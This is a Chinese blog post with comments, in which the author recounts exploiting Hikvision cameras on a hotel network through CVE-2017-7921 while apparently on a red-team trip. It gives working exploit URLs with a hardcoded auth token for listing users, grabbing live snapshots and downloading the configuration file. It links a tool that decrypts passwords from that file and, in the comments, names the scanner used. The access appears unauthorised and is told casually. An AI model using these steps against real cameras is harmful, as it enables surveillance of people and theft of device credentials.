一次hotel "fuck" 摄像头

FishM4n 2020-08-07 PM 1554℃ 11条

最近出去H V V,在酒店闲(tou)暇(lan)期间随手搞了搞摄像头。

首先
基操,,直接开扫,,发现好几个

然后
访问https://192.168.x.x/
一顿瞎🐔吧爆破弱口令 无果

再然后
这时候祭出神器 百度一下 ,百度告诉我有个CVE-2017-7921😮 那就试试

访问泄露信息:https://192.168.x.x/Security/users?auth=YWRtaW46MTEK

访问泄露快照:https://192.168.x.x/onvif-http/snapshot?auth=YWRtaW46MTEK
每刷新一下截取一次快照

访问会down一个配置文件:https://192.168.x.x/System/configurationFile?auth=YWRtaW46MTEK

文件通过工具解密后会拿到密码😏
工具链接:https://github.com/WormChickenWizard/hikvision-decrypter
通过巴拉巴拉解密后 耶嗨,密码就出来了

再再然后
嘿嘿嘿🚫溜了溜了

标签: Hikvision, CVE-2017-7921

非特殊说明,本博所有文章均为博主原创。

评论啦~



已有 11 条评论


  1. Reluctantly
    Reluctantly

    你好,请问一下,你那个反向解密的软件是那个软件?

    回复 2020-11-21 12:30
    1. FishMan
      FishMan 博主

      https://github.com/WormChickenWizard/hikvision-decrypter

      回复 2020-11-21 16:51
      1. Reluctantly
        Reluctantly

        多谢

        回复 2020-11-21 16:53
  2. aaa
    aaa

    请问一下物联网设扫描工具是什么?

    回复 2021-05-11 00:46
    1. FishM4n
      FishM4n 博主

      Goby

      回复 2021-05-11 08:56
      1. aaa
        aaa

        多谢

        回复 2021-05-11 11:14
  3. eleven
    eleven

    老铁 请教下那个解码器咋用...不懂c++

    回复 2021-05-25 09:53
    1. FishM4n
      FishM4n 博主

      打开工具 >> 导入文件 >> 点击解密 >> 保存完活,这跟你懂不懂c有啥关系🤨

      回复 2021-05-25 10:00
      1. eleven
        eleven

        绝就绝在 我不知道怎么打开工具(ಥ﹏ಥ)需要什么环境吗

        回复 2021-05-25 10:19
        1. FishM4n
          FishM4n 博主

          gayhub上有打包好的直接下载用就行,不会用gayhub?

          回复 2021-05-30 16:44
          1. eleven
            eleven

            草率了。当时没看到...以为要编译。谢谢啦

            2021-05-30 16:46